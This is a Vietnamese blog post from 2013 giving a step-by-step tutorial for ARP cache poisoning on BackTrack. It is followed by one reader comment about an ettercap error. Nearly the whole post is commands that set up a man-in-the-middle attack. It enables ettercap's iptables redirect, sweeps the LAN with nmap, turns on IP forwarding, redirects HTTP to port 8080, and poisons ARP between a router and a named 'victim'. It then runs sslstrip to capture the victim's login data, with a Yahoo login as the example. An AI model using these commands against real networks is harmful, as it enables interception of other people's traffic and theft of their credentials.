Chủ Nhật, 6 tháng 1, 2013

Attack Win với ARP Cache Poisoning trên Backtrack

Vào Terminal,chỉnh sửa file /etc/etter.conf
Gõ:nano /etc/etter.conf  rồi tìm đoạn sau

# if you use iptables:
  # redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %$
  # redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport $

Sửa lại thành như sau :(bỏ dấu # đi)

# if you use iptables:
  redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %$
  redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport $

Lưu lại và thoát ra
Tiếp theo ta scan network bằng nnap,ở đây là mạng lan
nmap -sP 192.168.40.1/24

Tiếp theo:
cat /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward



Tiếp theo setting như sau

Gõ :  iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
Tiếp: ettercap -i eth0 -TqM ARP:REMOTE /192.168.40.1/ /192.168.40.129/
Thứ tự ta gõ ip router trước và victim sau,ta nhận đc 

Chọn h để xem inline

Chọn p để active plugin

kích họat remote_browser



Như vậy bi giờ chỉ chờ victim họat động,sau khi victim vào 1 trang nào đó,ví dụ ở đây mình nhận đc là trang login.yahoo.com
thì ta nhận đc info như sau



Ta thấy victim đang dùng firefox để mở 1 cái gì đó,kéo lên trên thì ta biết đó là yahoo.com 



Nhưng ta vẫn ko xem đc gì,giờ ta dùng sslstrip để lưu lại info truyền đi từ victim

Mở thêm 1 konsole nữa chạy
cd /pentest/web/sslstrip/
chmod +x sslstrip.py
chạy :./sslstrip.py -l 8080


Sau đó ta vào sslstrip.log xem thành quả :))))


1 nhận xét:

  1. Xin pro chỉ giáo mình làm tới bước ettercap -T -q -e eth0 thì nó báo lỗi
    FATAL: inteface "usbmon1" not supported (USB with Liunux header)
    mình chạy trên máy ảo Pro có thể hướng dẫn mình được ko?

    Trả lờiXóa